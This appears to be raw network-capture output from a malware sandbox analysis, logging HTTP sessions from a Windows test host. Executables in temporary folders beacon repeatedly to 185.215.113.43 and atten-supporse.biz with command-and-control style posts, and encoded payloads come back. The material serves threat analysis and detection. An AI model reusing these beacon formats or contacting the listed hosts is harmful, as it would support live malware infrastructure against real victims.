                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.114893913 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Content-Length: 90
                                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 17:03:35 GMT
                                                                                                                                                                                                                                                              Age: 18367
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                              Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                              Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              14192.168.2.44989234.107.221.82805932C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.427329063 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                              Host: detectportal.firefox.com
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.513746977 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 02:26:01 GMT
                                                                                                                                                                                                                                                              Age: 71024
                                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                                              Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                              Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                              Data Ascii: success


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              15192.168.2.449893185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.493289948 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.824894905 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              16192.168.2.44989634.107.221.82805932C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.608695984 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                              Host: detectportal.firefox.com
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.694540977 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Content-Length: 90
                                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 12:18:23 GMT
                                                                                                                                                                                                                                                              Age: 35482
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                              Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                              Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:55.701523066 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              17192.168.2.449905185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:47.451219082 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:48.814275026 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:48 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              18192.168.2.449914185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:50.626092911 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:51.966738939 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:51 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              19192.168.2.449923185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:53.594707012 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:54.931030035 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              20192.168.2.449939185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:56.841376066 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:58.172768116 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              21192.168.2.449949185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.948918104 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.317770958 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:10:01 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449781104.21.48.14437872C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:16 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:16 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-09 22:09:17 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:16 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=38975hp099fo2ljc663pagorcj; expires=Fri, 04-Apr-2025 15:55:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thOj%2B28AvmNlh36gytL%2FDj3AiCkDxV%2F2%2FniIWsOK4SWA8O%2B734iHxjyzG%2FRFJowRVBc2T0SzUCy6GOmCMFrf2wDdgNe2Olmrt80wfLOLkmY4KxJEBZz4021%2FBz396gljiVLhKVg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef8518d6c070cc8-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1547&rtt_var=585&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1864623&cwnd=225&unsent_bytes=0&cid=e7200c059a057590&ts=1004&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:17 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-09 22:09:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.449790104.21.48.14437872C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:18 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 53
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:18 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:18 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=3dh3il0ik4ped9ka5nm919vpeh; expires=Fri, 04-Apr-2025 15:55:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYIi%2FIi837l2Bd8h4D%2FgfFHGPyCYo6ERM8P0rrThIwp6fuZNJI2IdkQbDxeTmHFkUTHHamtEJOEZT2HWjvFD%2Bs0oLll%2Fx82OL0CLjsrVsi%2Bzm0hE3QUmqxJ1h0%2BPtsOWu6TBLYI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef8519b9cff7ca5-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1788&rtt_var=682&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=955&delivery_rate=1590413&cwnd=243&unsent_bytes=0&cid=36929ec78b0172a8&ts=748&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC348INData Raw: 34 39 31 63 0d 0a 6d 6a 64 51 68 35 38 71 32 2f 5a 51 33 72 4e 78 35 53 42 37 53 73 39 6d 72 57 79 66 4a 54 5a 42 79 54 70 71 51 77 4c 30 77 31 66 68 46 53 61 6c 70 52 37 33 31 43 4f 37 6b 55 75 52 55 67 34 76 34 30 54 4d 43 4c 30 66 55 43 43 6c 53 51 39 76 49 49 4b 75 64 61 42 52 4d 65 76 73 54 2f 66 55 4e 61 61 52 53 37 35 62 57 53 2b 68 52 4a 64 4f 2b 6b 39 55 49 4b 56 59 43 79 68 74 68 4b 38 30 38 6c 73 33 37 2f 70 4a 76 35 63 38 73 39 59 55 67 45 45 52 4a 4b 59 4c 78 51 47 39 43 52 51 6b 73 78 68 51 59 55 2b 52 74 7a 62 58 56 69 50 73 76 56 66 33 6a 58 4b 37 33 56 50 66 41 68 6f 76 72 51 72 4c 43 50 52 4e 58 69 6d 74 57 51 34 70 63 70 32 6c 50 2f 4a 56 4e 4f 37 77 51 4b 75 61 4e 72 54 64 45 6f 70 42 57 57 62 74 41 39 64 4f 70 51 63 48 45 61 68 4a 47
                                                                                                                                                                                                                                                              Data Ascii: 491cmjdQh58q2/ZQ3rNx5SB7Ss9mrWyfJTZByTpqQwL0w1fhFSalpR731CO7kUuRUg4v40TMCL0fUCClSQ9vIIKudaBRMevsT/fUNaaRS75bWS+hRJdO+k9UIKVYCyhthK808ls37/pJv5c8s9YUgEERJKYLxQG9CRQksxhQYU+RtzbXViPsvVf3jXK73VPfAhovrQrLCPRNXimtWQ4pcp2lP/JVNO7wQKuaNrTdEopBWWbtA9dOpQcHEahJG
                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC1369INData Raw: 41 56 4e 4f 76 38 52 62 6d 47 4f 72 66 61 46 70 56 4a 45 43 57 67 42 4d 49 45 38 6b 52 55 4a 4b 46 53 42 79 74 6b 6d 36 77 7a 2b 46 56 79 71 37 31 50 6f 64 52 71 2f 50 49 57 6c 30 55 56 50 75 38 2b 6a 78 47 7a 58 68 51 6b 70 78 68 51 59 57 69 54 6f 6a 62 7a 57 6a 48 74 39 6c 71 35 68 6a 53 78 31 41 47 42 52 78 63 69 72 68 62 46 41 50 74 45 58 53 69 69 58 51 38 6c 49 4e 6a 68 4d 75 41 56 61 71 58 63 52 62 4b 59 4f 4b 76 52 55 35 67 4d 41 47 69 71 43 49 39 57 76 55 4e 56 4a 36 70 63 42 69 39 6b 6d 71 63 37 39 56 6f 30 37 2f 31 50 73 35 77 36 76 64 77 59 69 45 49 63 4a 61 6b 43 77 77 2f 34 42 78 70 6a 72 45 42 49 65 53 43 34 70 6a 62 71 46 77 66 6d 38 30 61 2b 67 6e 4b 6a 6e 77 72 48 52 52 56 6f 39 55 54 42 43 2f 4a 56 56 54 47 75 56 68 6f 74 5a 5a 43 73 4e
                                                                                                                                                                                                                                                              Data Ascii: AVNOv8RbmGOrfaFpVJECWgBMIE8kRUJKFSBytkm6wz+FVyq71PodRq/PIWl0UVPu8+jxGzXhQkpxhQYWiTojbzWjHt9lq5hjSx1AGBRxcirhbFAPtEXSiiXQ8lINjhMuAVaqXcRbKYOKvRU5gMAGiqCI9WvUNVJ6pcBi9kmqc79Vo07/1Ps5w6vdwYiEIcJakCww/4BxpjrEBIeSC4pjbqFwfm80a+gnKjnwrHRRVo9UTBC/JVVTGuVhotZZCsN
                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC1369INData Raw: 6d 38 30 61 2b 67 6e 4b 6a 6e 77 72 48 52 52 56 6f 39 55 54 43 42 76 68 43 57 79 4b 68 56 67 30 72 62 4a 36 76 4e 75 70 61 4e 75 58 78 51 4c 4f 5a 50 4c 6a 5a 47 6f 78 4a 48 79 69 73 44 6f 39 41 76 55 42 4d 59 2f 4d 59 50 43 5a 73 6d 36 35 33 7a 56 59 38 36 2f 70 65 2b 59 74 38 70 5a 45 55 69 77 4a 42 61 4b 45 4e 7a 77 58 33 51 31 51 6b 70 6c 30 4c 4a 6d 4f 62 70 6a 2f 32 55 6a 62 70 39 45 57 2f 6c 44 57 34 31 41 47 43 53 78 55 6b 37 55 71 50 43 65 55 48 44 47 4f 45 58 78 34 69 54 35 57 77 50 4c 68 4b 66 50 79 39 54 37 58 55 61 76 7a 57 46 6f 39 4a 48 79 43 74 46 73 6f 41 39 6b 5a 65 4a 61 70 56 42 43 64 67 6c 36 45 7a 39 46 55 31 34 75 39 61 76 4a 49 67 74 70 46 64 78 30 55 42 61 50 56 45 2b 52 37 71 56 6b 4a 68 6e 6c 73 47 4c 32 65 41 34 53 71 32 54 48
                                                                                                                                                                                                                                                              Data Ascii: m80a+gnKjnwrHRRVo9UTCBvhCWyKhVg0rbJ6vNupaNuXxQLOZPLjZGoxJHyisDo9AvUBMY/MYPCZsm653zVY86/pe+Yt8pZEUiwJBaKENzwX3Q1Qkpl0LJmObpj/2Ujbp9EW/lDW41AGCSxUk7UqPCeUHDGOEXx4iT5WwPLhKfPy9T7XUavzWFo9JHyCtFsoA9kZeJapVBCdgl6Ez9FU14u9avJIgtpFdx0UBaPVE+R7qVkJhnlsGL2eA4Sq2TH
                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC1369INData Raw: 73 34 59 36 73 74 77 59 69 45 6b 4c 4b 4b 41 41 77 77 72 31 54 46 35 6a 35 52 67 50 4f 53 44 4f 34 51 44 31 57 6a 4c 6d 36 77 69 6d 32 69 76 38 31 68 2f 48 47 6c 6b 6b 6f 77 54 41 41 76 46 4d 58 43 4b 6e 56 67 38 6b 61 5a 36 70 4a 2f 6c 52 4f 75 54 7a 52 37 69 51 4e 37 6e 56 46 49 4e 45 46 6d 6a 6a 52 4d 67 57 76 52 38 55 44 49 78 74 53 67 42 61 31 72 35 37 34 52 55 31 36 62 30 51 2b 5a 67 78 73 4e 6b 63 67 55 73 56 49 71 51 50 77 77 58 35 53 31 30 6d 72 56 6b 4e 4a 47 47 53 72 54 2f 2b 56 6a 48 71 38 6b 65 78 31 48 7a 38 31 67 76 48 47 6c 6b 4e 75 67 2f 42 43 4c 31 59 47 6a 72 72 58 77 52 68 4f 4e 61 74 50 50 35 54 4e 2b 6e 38 54 72 47 52 4f 72 6a 51 46 59 46 42 46 69 79 6f 42 63 41 4b 38 55 6c 65 49 71 70 55 41 79 35 72 6b 2b 46 37 75 46 49 71 70 61 55
                                                                                                                                                                                                                                                              Data Ascii: s4Y6stwYiEkLKKAAwwr1TF5j5RgPOSDO4QD1WjLm6wim2iv81h/HGlkkowTAAvFMXCKnVg8kaZ6pJ/lROuTzR7iQN7nVFINEFmjjRMgWvR8UDIxtSgBa1r574RU16b0Q+ZgxsNkcgUsVIqQPwwX5S10mrVkNJGGSrT/+VjHq8kex1Hz81gvHGlkNug/BCL1YGjrrXwRhONatPP5TN+n8TrGROrjQFYFBFiyoBcAK8UleIqpUAy5rk+F7uFIqpaU
